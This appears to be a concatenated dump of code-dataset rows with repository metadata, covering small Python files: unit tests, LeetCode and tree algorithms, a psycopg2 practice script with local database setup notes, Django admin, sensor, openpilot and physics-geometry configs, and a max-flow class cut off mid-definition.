# Create sandbox dataset
sandbox_dataset = sandbox.create_sandbox_dataset(
self.project_id, self.dataset_id)
# Post condition checks
post_test_datasets_obj = list(self.client.list_datasets(
self.project_id))
post_test_datasets = [d.dataset_id for d in post_test_datasets_obj]
# make sure the dataset didn't already exist
self.assertTrue(sandbox_dataset not in pre_test_datasets)
# make sure it was actually created
self.assertTrue(sandbox_dataset in post_test_datasets)
# Try to create same sandbox, which now already exists
self.assertRaises(RuntimeError, sandbox.create_sandbox_dataset,
self.project_id, self.dataset_id)
def tearDown(self):
# Remove fake dataset created in project
self.client.delete_dataset(self.fq_sandbox_id,
delete_contents=True,
not_found_ok=True)
| [
"noreply@github.com"
] | nishanthpp93.noreply@github.com |
0a02e0e66c2bc59500b508dbfc467fcab4c3580d | 6febd920ced70cbb19695801a163c437e7be44d4 | /leetcode_oj/tree/lowest_common_ancestor.py | 36f0233451b0db28999def6a1c089ac431795fcf | [] | no_license | AngryBird3/gotta_code | b0ab47e846b424107dbd3b03e0c0f3afbd239c60 | b9975fef5fa4843bf95d067bea6d064723484289 | refs/heads/master | 2021-01-20T16:47:35.098125 | 2018-03-24T21:31:01 | 2018-03-24T21:31:01 | 53,180,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,814 | py | #!/usr/bin/python
'''
Find the least common ancestor in binary tree
'''
class TreeNode:
def __init__(self, val, l = None, r = None):
self.val = val
self.l = l
self.r = r
class Solution:
def findAncestor(self, tree, node1, node2):
if not node1 or not node2:
return None
node1_path = list()
node2_path = list()
if not self.find_path(tree, node1, node1_path) or \
not self.find_path(tree, node2, node2_path):
return None
print node1_path
print node2_path
#Find the first index where path doesn't match
i = 0
while (i < len(node1_path) and i < len(node2_path)):
if node1_path[i] != node2_path[i]:
break
i += 1
return node1_path[i-1]
def find_path(self, t, n, path):
if not t:
return False
path.append(t.val)
if n == t.val:
return True
if (t.l and self.find_path(t.l, n, path)) or (t.r and self.find_path(t.r, n, path)):
return True
path.pop()
return False
def lowestCommonAncestor(self, root, p, q):
if not root:
return None
if root == p or root == q:
return root
matching_left = self.lowestCommonAncestor(root.l, p, q)
matching_right = self.lowestCommonAncestor(root.r, p, q)
print "root : ", root.val, " m_l: ", matching_left.val if matching_left else "None", \
" m_r: ", matching_right.val if matching_right else "None"
#If both match, root is LCA
if matching_left and matching_right:
return root
#Found both the node on one side
return matching_left if matching_left else matching_right
s = Solution()
t8 = TreeNode(8, None, None)
t0 = TreeNode(0, None, None)
t1 = TreeNode(1, t0, t8)
t4 = TreeNode(4, None, None)
t7 = TreeNode(7, None, None)
t2 = TreeNode(2, t7, t4)
t6 = TreeNode(6, None, None)
t5 = TreeNode(5, t6, t2)
root = TreeNode(3, t5, t1)
print s.lowestCommonAncestor(root, t6, t4)
| [
"dhaaraa.darji@gmail.com"
] | dhaaraa.darji@gmail.com |
ae10124f9637a093727bec5c3a8a47e836fbb458 | ad01faab6dd663dc5193eb8383fdc2d24c2df23d | /_psycopg2/main.py | 0da670d63333ca337b3b928c0fb107341902ee35 | [] | no_license | jurgeon018/snippets | 585db91b8120076b37deaa37393b34f7c61fec66 | e0ab24a99791c3b25422a3208f02919cf98ca084 | refs/heads/master | 2023-05-14T12:31:48.139452 | 2023-01-23T03:33:41 | 2023-01-23T03:33:41 | 222,001,233 | 0 | 0 | null | 2023-05-01T22:16:48 | 2019-11-15T20:51:27 | Python | UTF-8 | Python | false | false | 1,949 | py | import psycopg2
import psycopg2.extras
import psycopg2.errors
conn = psycopg2.connect(
database='psycopg2_test_db',
user='jurgeon',
password='69018',
host='127.0.0.1',
port=5432,
)
cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# cur.execute('''
# create table users (id serial primary key, login varchar(64), password varchar(64))
# ''')
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("afiskon", "123"))
cur.execute("INSERT INTO users (login, password) VALUES (%s, %s)",
("eax", "456"))
cur.execute(
"UPDATE users SET password = %(password)s WHERE login = %(login)s",
{"login":"eax", "password":"789"}
)
cur.execute("DELETE FROM users WHERE id = %s", (2,))
cur.execute("PREPARE insuser AS " +
"INSERT INTO users (login, password) VALUES ($1, $2)")
cur.execute("EXECUTE insuser(%s, %s)", ("afiskon", "123"))
cur.execute("EXECUTE insuser(%s, %s)", ("eax", "456"))
conn.commit()
cur.execute("SELECT version()")
cur.execute('SELECT * FROM users LIMIT 10')
print(cur.fetchone())
records = cur.fetchall()
# for record in records:
# # print(dict(record.items()))
# print(record['login'])
with conn:
with conn.cursor() as cur:
cur.close()
conn.close()
'''
# створює юзера в БД. Вводити 1 раз перед початком розробки.
sudo -u postgres psql -c "create user jurgeon with password '69018'; alter role jurgeon set client_encoding to 'utf8'; alter role jurgeon set default_transaction_isolation to 'read committed'; alter role jurgeon set timezone to 'UTC';"
# це не чіпай
#####sudo -u postgres psql -c 'create database psycopg2_test_db;'
#####sudo -u postgres psql -c 'grant all privileges on database psycopg2_test_db to jurgeon;'
# видаляє БД
sudo -u postgres psql -c "drop database eleek; "
# створює БД
sudo -u postgres psql -c "create database eleek owner jurgeon; "
''' | [
"jurgeon018@gmail.com"
] | jurgeon018@gmail.com |
daa62f58f170435922812b7e0cd13136bcac3329 | b1cf54e4d6f969d9084160fccd20fabc12c361c2 | /leetcode/first_bad_version.py | a240686a6a5620942a6e98d87cbde784e6963a9c | [] | no_license | zarkle/code_challenges | 88a53477d6f9ee9dd71577678739e745b9e8a694 | 85b7111263d4125b362184df08e8a2265cf228d5 | refs/heads/master | 2021-06-10T11:05:03.048703 | 2020-01-23T06:16:41 | 2020-01-23T06:16:41 | 136,668,643 | 0 | 1 | null | 2019-02-07T23:35:59 | 2018-06-08T21:44:26 | JavaScript | UTF-8 | Python | false | false | 1,159 | py | # https://leetcode.com/problems/first-bad-version/
# https://leetcode.com/articles/first-bad-version/
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid):
last = mid - 1
else:
first = mid + 1
return first
# 32 ms, 99.8%
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
first = 0
last = n
while first <= last:
mid = (first + last) // 2
if isBadVersion(mid) == True:
if isBadVersion(mid - 1) == False:
return mid
last = mid - 1
else:
first = mid + 1 | [
"beverly.pham@gmail.com"
] | beverly.pham@gmail.com |
60e99e3c34a04fa47c76b65eeb7e6b16e810f619 | 9ed385053e7f28bfd0c6f186fc4963faac43eb96 | /store/admin.py | 242da77e1948b6798d3a5b94197f9a83ae85741d | [] | no_license | Pagante/greatkart-django | ffadfb5d4827220f3df588fb1d21dc28f1359ce0 | d4bb679c7fd270435f4ce0cc8854bdb3d2e134dd | refs/heads/main | 2023-05-12T01:07:53.092949 | 2021-05-30T16:34:07 | 2021-05-30T16:34:07 | 365,899,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | from django.contrib import admin
from django.db import models
from .models import Product, Variation, reviewRating
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
list_display = ('id', 'product_name','price', 'stock', 'category','modified_date', 'is_available')
prepopulated_fields = {'slug': ('product_name',)}
list_display_links = ('id', 'product_name', 'price', 'stock')
class VariationAdmin(admin.ModelAdmin):
list_display = ('id','product', 'variation_category', 'variation_value' ,'is_active')
list_display_links = ('id','product', 'variation_category', 'variation_value' )
list_editable = ('is_active',)
list_filter = ('product', 'variation_category', 'variation_value' )
admin.site.register(Product, ProductAdmin)
admin.site.register(Variation, VariationAdmin)
admin.site.register(reviewRating) | [
"55301195+Pagante@users.noreply.github.com"
] | 55301195+Pagante@users.noreply.github.com |
4095bae2f056ec0ad61e9b477a8afdbf75a69e26 | b9e5aebb49734ad47825130529bd64e59f690ecf | /chapter_3/greeting.py | 78fd31f144aa4c16e330ae31c4398f6ae86f6131 | [] | no_license | mikegirenko/python-learning | dab0f67d990d95035f93720986c84aaf422f7a9f | db9e3f0e3897caf703169d1f14b15a9aa1901161 | refs/heads/master | 2021-07-09T08:03:40.535653 | 2020-08-05T00:13:41 | 2020-08-05T00:13:41 | 169,983,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | my_friends = ['bob', 'dave', 'tom']
print('Hello, my first friend ' + my_friends[0].title())
print('Hello, my second friend ' + my_friends[1].title())
print('Hello, my last friend ' + my_friends[-1].title())
| [
"mike.girenko@cybergrx.com"
] | mike.girenko@cybergrx.com |
2670eb26885abb954a926b8bbdf67cab549a0831 | 9da8754002fa402ad8e6f25659978bd269bbcec8 | /src/74A/cdf_74A.py | e07ce0c876f071bb2b46f0dfd4a3368160518a56 | [
"MIT"
] | permissive | kopok2/CodeforcesSolutionsPython | a00f706dbf368ba0846c8ae86d4145b5dd3e1613 | 35bec0dbcff47765b123b5fe60476014376153df | refs/heads/master | 2023-02-02T03:08:22.097651 | 2020-12-17T22:00:50 | 2020-12-17T22:00:50 | 196,035,812 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from operator import itemgetter
class CodeforcesTask74ASolution:
def __init__(self):
self.result = ''
self.n = 0
self.participants = []
def read_input(self):
self.n = int(input())
for x in range(self.n):
self.participants.append(input().split(" "))
def process_task(self):
scores = []
for part in self.participants:
score = 0
score += int(part[1]) * 100
score -= int(part[2]) * 50
score += sum([int(x) for x in part[2:]])
scores.append((part[0], score))
scores.sort(reverse=True, key=itemgetter(1))
self.result = scores[0][0]
def get_result(self):
return self.result
if __name__ == "__main__":
Solution = CodeforcesTask74ASolution()
Solution.read_input()
Solution.process_task()
print(Solution.get_result())
| [
"oleszek.karol@gmail.com"
] | oleszek.karol@gmail.com |
aed45e56c7dc367acf8f001535bbe48a7d4e1b21 | 6841f44b102572978b67af7b9fba9db03f75a6c3 | /cravattdb/contrib/residue_number_annotation/__init__.py | d74359f210fd5f30cb7a1134f916ebcb18581c7f | [] | no_license | radusuciu/cravattdb | 69fae8c30a94774420024ad4b90c285bc9c2c64c | bc4b2a147a374eed2e9350e824df85ba2108fca9 | refs/heads/master | 2021-06-06T08:29:41.824284 | 2016-10-21T21:57:13 | 2016-10-21T21:57:13 | 65,228,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,980 | py | """Blergh."""
from cravattdb.contrib.residue_number_annotation import uniprot
from urllib.parse import urlparse
from functools import partial
import ftplib
import pathlib
import gzip
SWISSPROT_URL = urlparse(
'ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/taxonomic_divisions/uniprot_sprot_human.dat.gz'
)
ABS_PATH = pathlib.Path(__file__).parents[0]
SWISSPROT_DAT = pathlib.Path(ABS_PATH, 'data/uniprot_sprot_human.dat')
DATA_PATH = pathlib.Path(ABS_PATH, 'data/uniprot.json')
def get_residue_number(experiment_type):
if experiment_type == 'isotop':
return partial(_get_residue_number, db=get_db())
else:
return None
def _get_residue_number(uniprot_id, peptide, db=None):
"""Return residue number for labeled cysteine in a given protein."""
residue = None
if not db:
db = get_db()
try:
residue = uniprot.get_residue_number(db, uniprot_id, peptide)
except:
pass
finally:
return residue
def get_db():
"""Get a handle to uniprot db, downloading if necessary."""
if not DATA_PATH.exists() and not SWISSPROT_DAT.exists():
download_database()
db = uniprot.init(
data_path=str(DATA_PATH),
input_data_path=str(SWISSPROT_DAT)
)
cleanup_database_files()
return db
def download_database():
# heard you like context managers
db_path = pathlib.Path(SWISSPROT_URL.path)
archive_path = pathlib.Path('data', db_path.name)
with ftplib.FTP(SWISSPROT_URL.netloc) as ftp:
ftp.login()
ftp.cwd(str(db_path.parent))
retr_command = 'RETR {}'.format(str(db_path.name))
ftp.retrbinary(retr_command, open(str(archive_path), 'wb').write)
with gzip.open(str(archive_path), 'r') as z:
with open(str(SWISSPROT_DAT), 'wb') as f:
f.writelines(z)
def cleanup_database_files():
"""If there are any giant downloaded files, delete them."""
pass
| [
"radusuciu@gmail.com"
] | radusuciu@gmail.com |
7dedc777e0e8c11ea0c28aa6c6a08bd4e0d6cf3f | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/bno08x_simpletest.py | 7be292ef80153375b4ff5a7b2baf3d3e200f97f0 | [] | no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,477 | py | # SPDX-FileCopyrightText: 2020 Bryan Siepert, written for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
import time
import board
import busio
from adafruit_bno08x import (
BNO_REPORT_ACCELEROMETER,
BNO_REPORT_GYROSCOPE,
BNO_REPORT_MAGNETOMETER,
BNO_REPORT_ROTATION_VECTOR,
)
from adafruit_bno08x.i2c import BNO08X_I2C
i2c = busio.I2C(board.SCL, board.SDA, frequency=800000)
bno = BNO08X_I2C(i2c)
bno.enable_feature(BNO_REPORT_ACCELEROMETER)
bno.enable_feature(BNO_REPORT_GYROSCOPE)
bno.enable_feature(BNO_REPORT_MAGNETOMETER)
bno.enable_feature(BNO_REPORT_ROTATION_VECTOR)
while True:
time.sleep(0.5)
print("Acceleration:")
accel_x, accel_y, accel_z = bno.acceleration # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f m/s^2" % (accel_x, accel_y, accel_z))
print("")
print("Gyro:")
gyro_x, gyro_y, gyro_z = bno.gyro # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f rads/s" % (gyro_x, gyro_y, gyro_z))
print("")
print("Magnetometer:")
mag_x, mag_y, mag_z = bno.magnetic # pylint:disable=no-member
print("X: %0.6f Y: %0.6f Z: %0.6f uT" % (mag_x, mag_y, mag_z))
print("")
print("Rotation Vector Quaternion:")
quat_i, quat_j, quat_k, quat_real = bno.quaternion # pylint:disable=no-member
print(
"I: %0.6f J: %0.6f K: %0.6f Real: %0.6f" % (quat_i, quat_j, quat_k, quat_real)
)
print("")
| [
"nams@nist.gov"
] | nams@nist.gov |
95fcf4a17f0202eed8705013ffc615e1f1de0c74 | 7ef01829aca4b92687780d45745f62ca33480bc1 | /selfdrive/debug/dump.py | 89dd43fa4ce002a291378926b2c0b45a34ec58a6 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | Jamezz/openpilot | 25392231ff229dc3dd360fa6bf782326d962496f | 5272c6b18e56a7124a56d2c2f6d8a7d7b2d4ac10 | refs/heads/volt | 2020-03-08T06:59:47.872585 | 2018-03-27T04:40:15 | 2018-03-27T04:40:15 | 127,984,350 | 0 | 0 | MIT | 2018-05-15T15:02:00 | 2018-04-04T00:25:52 | C | UTF-8 | Python | false | false | 2,576 | py | #!/usr/bin/env python
import sys
import argparse
import zmq
import json
from hexdump import hexdump
from threading import Thread
from cereal import log
import selfdrive.messaging as messaging
from selfdrive.services import service_list
def run_server(socketio):
socketio.run(app, host='0.0.0.0', port=4000)
if __name__ == "__main__":
context = zmq.Context()
poller = zmq.Poller()
parser = argparse.ArgumentParser(description='Sniff a communcation socket')
parser.add_argument('--pipe', action='store_true')
parser.add_argument('--raw', action='store_true')
parser.add_argument('--json', action='store_true')
parser.add_argument('--dump-json', action='store_true')
parser.add_argument('--no-print', action='store_true')
parser.add_argument('--proxy', action='store_true', help='republish on localhost')
parser.add_argument('--map', action='store_true')
parser.add_argument('--addr', default='127.0.0.1')
parser.add_argument("socket", type=str, nargs='*', help="socket name")
args = parser.parse_args()
republish_socks = {}
for m in args.socket if len(args.socket) > 0 else service_list:
if m in service_list:
port = service_list[m].port
elif m.isdigit():
port = int(m)
else:
print("service not found")
exit(-1)
sock = messaging.sub_sock(context, port, poller, addr=args.addr)
if args.proxy:
republish_socks[sock] = messaging.pub_sock(context, port)
if args.map:
from flask.ext.socketio import SocketIO
from flask import Flask
app = Flask(__name__)
socketio = SocketIO(app, async_mode='threading')
server_thread = Thread(target=run_server, args=(socketio,))
server_thread.daemon = True
server_thread.start()
print 'server running'
while 1:
polld = poller.poll(timeout=1000)
for sock, mode in polld:
if mode != zmq.POLLIN:
continue
msg = sock.recv()
evt = log.Event.from_bytes(msg)
if sock in republish_socks:
republish_socks[sock].send(msg)
if args.map and evt.which() == 'liveLocation':
print 'send loc'
socketio.emit('location', {
'lat': evt.liveLocation.lat,
'lon': evt.liveLocation.lon,
'alt': evt.liveLocation.alt,
})
if not args.no_print:
if args.pipe:
sys.stdout.write(msg)
sys.stdout.flush()
elif args.raw:
hexdump(msg)
elif args.json:
print(json.loads(msg))
elif args.dump_json:
print json.dumps(evt.to_dict())
else:
print evt
| [
"user@comma.ai"
] | user@comma.ai |
f2cd0ab77cb5f8fa5558cf6172353ec2230c9127 | f3d38d0e1d50234ce5f17948361a50090ea8cddf | /CodeUp/Python 기초 100제/6036번 ; 단어 여러 번 출력하기.py | bc0bcc44a3400612fd542a6d58530b3105f25276 | [] | no_license | bright-night-sky/algorithm_study | 967c512040c183d56c5cd923912a5e8f1c584546 | 8fd46644129e92137a62db657187b9b707d06985 | refs/heads/main | 2023-08-01T10:27:33.857897 | 2021-10-04T14:36:21 | 2021-10-04T14:36:21 | 323,322,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # https://codeup.kr/problem.php?id=6036
# readline을 사용하기 위해 import합니다.
from sys import stdin
# 단어와 반복 횟수를 공백으로 구분해 입력합니다.
word, repeat_cnt = stdin.readline().split(' ')
# 반복 횟수는 정수형으로 변환합니다.
repeat_cnt = int(repeat_cnt)
# 입력한 단어를 입력한 횟수만큼 반복해 출력합니다.
print(word * repeat_cnt) | [
"bright_night_sky@naver.com"
] | bright_night_sky@naver.com |
c6e462a6e0fd6dad1a07c73b7443f6fd2dfd4419 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s591389519.py | 8762798d4042e04b87616ffd6fa0f37468561ff7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | # -*- coding: utf-8 -*-
s = input()
cnt = {l:0 for l in set(s)}
if len(cnt) != 2:
print('No')
exit(0)
for l in s:
cnt[l] += 1
if cnt[l] > 2:
print('No')
exit(0)
print('Yes')
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5f7afd4b4b67a971d1a07293744294fe27cd11a4 | 256644d14bd15f8e1a3e92c95b1655fd36681399 | /backup/GA_NN/v4/testGA.py | c6a234d32f017184ac400c1068bb0f05643dd4d1 | [] | no_license | mfbx9da4/neuron-astrocyte-networks | 9d1c0ff45951e45ce1f8297ec62b69ee4159305a | bcf933491bdb70031f8d9c859fc17e0622e5b126 | refs/heads/master | 2021-01-01T10:13:59.099090 | 2018-06-03T12:32:13 | 2018-06-03T12:32:13 | 12,457,305 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,124 | py | import unittest
from GA import createPop, pairPop, NN, rankPop, itemgetter
from GA import evolveNewPop, selectTwoIndividuals
from pylab import where, array
class testcreatePop(unittest.TestCase):
def setUp(self):
self.pop = createPop()
def testType(self):
for ind in self.pop:
self.assertIsInstance(ind, NN)
def testWeightsAreNotTheSame(self):
"""Compares each weight against all others but could be sped
up don't need to compare twice"""
for i in range(len(self.pop)):
for j in range(len(self.pop)):
if i != j:
wi1 = array(self.pop[i].wi)
wi2 = array(self.pop[j].wi)
comparisons = where( wi1 == wi2, True, False)
for c in comparisons:
self.assertFalse(c.all())
wo1 = array(self.pop[i].wo)
wo2 = array(self.pop[j].wo)
comparisons = where( wo1 == wo2, True, False)
for c in comparisons:
self.assertFalse(c.all())
def testShapeOfInputWeights(self):
for ind in self.pop:
self.assertEqual(array(ind.wi).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pop:
self.assertEqual(array(ind.wo).shape,
(NN.nh, NN.no))
class testpairPop(unittest.TestCase):
"""
paired pop is zip(weights, errors, fitnesses)
accessed in the order:
pairedPop[individual][weights][input/output weights]
"""
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
def testShapeOfPairedPop(self):
self.assertEqual(array(self.pairedPop).shape,
(NN.pop_size, 4))
def testWeightsAreACopy(self):
for i in range(len(self.pop)):
self.assertNotEqual(id(self.pop[i].wi),
id(self.pairedPop[i][0][0]),
'input weights, ind ' + str(i) )
self.assertNotEqual(id(self.pop[i].wo),
id(self.pairedPop[i][0][1]),
'output weights, ind ' + str(i))
def testShapeOfInputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][0]).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][1]).shape,
(NN.nh, NN.no))
class testrankPop(unittest.TestCase):
def setUp(self):
# need to test that rankedPop is ordered in descending order
pass
class testevolveNewPop(unittest.TestCase):
"""
rankedPop is zip(weights, errors, fitnesses) ordered in descending
order of fitness
"""
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
self.rankedWeights = [x[0] for x in self.rankedPop]
self.fitnessScores = [x[-1] for x in self.rankedPop]
self.newpopW = evolveNewPop(self.rankedPop)
def testShapeOfInputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][0]).shape,
(NN.ni, NN.nh))
def testShapeOfOutputWeights(self):
for ind in self.pairedPop:
self.assertEqual(array(ind[0][1]).shape,
(NN.nh, NN.no))
def testNotCopiesOfRankedPop(self):
for i in range(len(self.newpopW)):
for j in range(len(self.rankedWeights)):
self.assertNotEqual(id(self.newpopW[i]),
id(self.rankedWeights[j]),
'individual %d\'s weights are a view of ranked' % i +
'weights %d' % j)
for io in range(len(self.newpopW[i])):
self.assertNotEqual(id(self.newpopW[i][io]),
id(self.rankedWeights[j][io]),
'individual %d\'s %d weights are a view '
% (i, io) + 'of ranked weights %d' % j)
def testElitism(self):
for i in range(NN.eliteN):
for io in range(2):
shouldBeZeros = self.rankedWeights[i][io] - self.newpopW[i][io]
self.assertFalse(shouldBeZeros.any())
def testLengthOfNewPop(self):
self.assertEqual(len(self.newpopW), NN.pop_size)
def testShapeOfNewPop(self):
oldshape = array(self.rankedWeights).shape
newshape = array(self.newpopW).shape
self.assertEqual(oldshape, newshape)
for i in range(len(self.pop)):
for io in range(len(self.rankedWeights[i])):
assert io <= 1
self.assertEqual(
array(self.rankedWeights[i][io]).shape,
array(self.newpopW[i][io]).shape)
class testselectTwoIndividuals(unittest.TestCase):
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
self.rankedWeights = [x[0] for x in self.rankedPop]
self.fitnessScores = [x[-1] for x in self.rankedPop]
self.ch1, self.ch2 = selectTwoIndividuals(self.fitnessScores, self.rankedWeights)
def testChromosomesAreNotShallowCopies(self):
for i in range(len(self.rankedWeights)):
self.assertNotEqual(
id(self.ch1),
id(self.rankedWeights[i]))
self.assertNotEqual(
id(self.ch2),
id(self.rankedWeights[i]))
for io in range(len(self.rankedWeights[i])):
assert io <= 1
self.assertNotEqual(
id(self.ch1[io]),
id(self.rankedWeights[i][io]))
self.assertNotEqual(
id(self.ch2[io]),
id(self.rankedWeights[i][io]))
if __name__ == '__main__':
unittest.main() | [
"dalberto.adler@gmail.com"
] | dalberto.adler@gmail.com |
06cb9f6621d634240e8d8059be5f33b447dbb0d2 | 7887a24a4c0eed525a044b785e950d9a71ea7558 | /SimG4Core/PrintGeomInfo/test/python/runDDD2026_cfg.py | ab8ed29b51b7e934ab9a57aa86d12a95a6ee501a | [
"Apache-2.0"
] | permissive | CMS-HGCAL/cmssw | 1aba653346d5a6a69aa60629b7b0cf81880cef91 | 03230166537ea0ea9e0c975cf28964ee81d545ae | refs/heads/hgcal-condformat-HGCalNANO-13_2_0_pre2 | 2023-08-16T21:25:36.872190 | 2023-08-14T20:05:05 | 2023-08-15T23:28:48 | 62,036,013 | 2 | 2 | Apache-2.0 | 2023-09-12T13:02:50 | 2016-06-27T07:48:31 | C++ | UTF-8 | Python | false | false | 3,674 | py | ###############################################################################
# Way to use this:
# cmsRun runDDD2026_cfg.py geometry=D88
#
# Options for geometry D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99
#
###############################################################################
import FWCore.ParameterSet.Config as cms
import os, sys, imp, re
import FWCore.ParameterSet.VarParsing as VarParsing
####################################################################
### SETUP OPTIONS
options = VarParsing.VarParsing('standard')
options.register('geometry',
"D92",
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"geometry of operations: D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99")
### get and parse the command line arguments
options.parseArguments()
print(options)
####################################################################
# Use the options
if (options.geometry == "D94"):
from Configuration.Eras.Era_Phase2C20I13M9_cff import Phase2C20I13M9
process = cms.Process('G4PrintGeometry',Phase2C20I13M9)
else:
from Configuration.Eras.Era_Phase2C17I13M9_cff import Phase2C17I13M9
process = cms.Process('G4PrintGeometry',Phase2C17I13M9)
geomFile = "Configuration.Geometry.GeometryExtended2026" + options.geometry + "Reco_cff"
materialFileName = "matfile" + options.geometry + "DDD.txt"
solidFileName = "solidfile" + options.geometry + "DDD.txt"
lvFileName = "lvfile" + options.geometry + "DDD.txt"
pvFileName = "pvfile" + options.geometry + "DDD.txt"
touchFileName = "touchfile" + options.geometry + "DDD.txt"
regionFileName = "regionfile" + options.geometry + "DDD.txt"
print("Geometry file Name: ", geomFile)
print("Material file Name: ", materialFileName)
print("Solid file Name: ", solidFileName)
print("LV file Name: ", lvFileName)
print("PV file Name: ", pvFileName)
print("Touch file Name: ", touchFileName)
print("Region file Name: ", regionFileName)
process.load(geomFile)
process.load('FWCore.MessageService.MessageLogger_cfi')
from SimG4Core.PrintGeomInfo.g4PrintGeomInfo_cfi import *
process = printGeomInfo(process)
if hasattr(process,'MessageLogger'):
process.MessageLogger.G4cerr=dict()
process.MessageLogger.G4cout=dict()
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
DumpSummary = cms.untracked.bool(True),
DumpLVTree = cms.untracked.bool(False),
DumpMaterial = cms.untracked.bool(False),
DumpLVList = cms.untracked.bool(False),
DumpLV = cms.untracked.bool(False),
DumpSolid = cms.untracked.bool(True),
DumpAttributes = cms.untracked.bool(False),
DumpPV = cms.untracked.bool(False),
DumpRotation = cms.untracked.bool(False),
DumpReplica = cms.untracked.bool(False),
DumpTouch = cms.untracked.bool(False),
DumpSense = cms.untracked.bool(False),
DumpRegion = cms.untracked.bool(False),
DD4hep = cms.untracked.bool(False),
Name = cms.untracked.string(''),
Names = cms.untracked.vstring(''),
MaterialFileName = cms.untracked.string(materialFileName),
SolidFileName = cms.untracked.string(solidFileName),
LVFileName = cms.untracked.string(lvFileName),
PVFileName = cms.untracked.string(pvFileName),
TouchFileName = cms.untracked.string(touchFileName),
RegionFileName = cms.untracked.string(regionFileName),
FileDetail = cms.untracked.bool(True),
type = cms.string('PrintGeomInfoAction')
))
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
694642cedfed44db0b0286b0ec4dbb6e4b50e77a | 29b58edf26d0e4a965ea758c1f0e6ae51a61d3ed | /Loops/1loops.py | dfc631f39038bed104ec937e38d0060f11e1f85e | [] | no_license | namntran/modern_python3_bootcamp | bfe0fc8b647329f44ad4228d7a12480b9f3821cd | 6b273112b4bd324b95d0dc148c46f605c792c167 | refs/heads/master | 2020-06-16T20:27:41.891467 | 2020-02-16T04:53:16 | 2020-02-16T04:53:16 | 195,694,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | # i = 1
# while i < 5:
# i += i #increment i by 1
# print(i)
# print 1 to 5
# i = 0
# while i <= 5:
# i += 1
# print(i)
# from random import randint # use randint(a, b) to generate a random number between a and b
from random import randint
number = 0 #store random number in here, each time through
i = 0 # i should be incremented by one each iteration
while number != 5: #keep looping while number is not 5
i += 1
number = randint(1, 10) #update number to be a new random int from 1-10
print(number) | [
"namtran78@gmail.com"
] | namtran78@gmail.com |
2ce0d6b47e327d9dac0dc05d12e07d920f9cbc62 | 94df1d5cd401bd035e36cb96d2ceacd09b223ac0 | /python_library/graph/dinic.py | 256fdc946c39601eaced238f0e62a3606df045f8 | [
"MIT"
] | permissive | knuu/contest_library | 3b7dce152041009c37caf11a483f9e79e74052ad | 0d3bff34df965d00e1e4a0f2e4fbe8e822810fd5 | refs/heads/master | 2022-11-09T20:44:33.430736 | 2022-11-05T16:22:21 | 2022-11-05T16:22:21 | 180,644,772 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py | import collections
class MaxFlow:
"""Calculate max flow by Dinic's algorithm
complexity: O(EV^2)
used in GRL6A(AOJ)
"""
class Edge:
"""edge in flow networks"""
def __init__(self, to, cap, rev):
self.to, self.cap, self.rev = to, cap, rev
def __init__(self, V):
""" V: the number of vertexes
E: adjacency list
source: start point
sink: goal point
"""
self.V = V
self.E = [[] for _ in range(V)]
def add_edge(self, fr, to, cap):
self.E[fr].append(self.Edge(to, cap, len(self.E[to])))
